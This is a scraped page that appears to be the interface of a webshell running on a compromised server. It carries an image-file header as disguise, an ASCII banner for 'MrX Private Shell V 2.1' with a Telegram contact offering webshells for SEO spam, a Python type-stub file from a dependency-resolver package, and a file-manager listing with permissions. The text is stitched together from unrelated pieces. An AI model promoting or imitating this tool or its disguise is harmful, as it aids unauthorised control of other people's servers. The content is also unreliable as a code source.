����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
from typing import (
Any,
Generic,
Iterable,
Iterator,
Mapping,
Protocol,
Sequence,
Union,
)
from .reporters import BaseReporter
from .resolvers import RequirementInformation
from .structs import CT, KT, RT, Matches
class Preference(Protocol):
def __lt__(self, __other: Any) -> bool: ...
class AbstractProvider(Generic[RT, CT, KT]):
def identify(self, requirement_or_candidate: Union[RT, CT]) -> KT: ...
def get_preference(
self,
identifier: KT,
resolutions: Mapping[KT, CT],
candidates: Mapping[KT, Iterator[CT]],
information: Mapping[KT, Iterator[RequirementInformation[RT, CT]]],
backtrack_causes: Sequence[RequirementInformation[RT, CT]],
) -> Preference: ...
def find_matches(
self,
identifier: KT,
requirements: Mapping[KT, Iterator[RT]],
incompatibilities: Mapping[KT, Iterator[CT]],
) -> Matches: ...
def is_satisfied_by(self, requirement: RT, candidate: CT) -> bool: ...
def get_dependencies(self, candidate: CT) -> Iterable[RT]: ...
class AbstractResolver(Generic[RT, CT, KT]):
base_exception = Exception
provider: AbstractProvider[RT, CT, KT]
reporter: BaseReporter
def __init__(
self, provider: AbstractProvider[RT, CT, KT], reporter: BaseReporter
): ...
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| __pycache__ | Folder | 0755 |
|
|
| compat | Folder | 0755 |
|
|
| __init__.py | File | 537 B | 0644 |
|
| __init__.pyi | File | 564 B | 0644 |
|
| providers.py | File | 5.73 KB | 0644 |
|
| providers.pyi | File | 1.31 KB | 0644 |
|
| py.typed | File | 0 B | 0644 |
|
| reporters.py | File | 1.56 KB | 0644 |
|
| reporters.pyi | File | 503 B | 0644 |
|
| resolvers.py | File | 20.03 KB | 0644 |
|
| resolvers.pyi | File | 2.43 KB | 0644 |
|
| structs.py | File | 4.85 KB | 0644 |
|
| structs.pyi | File | 1.09 KB | 0644 |
|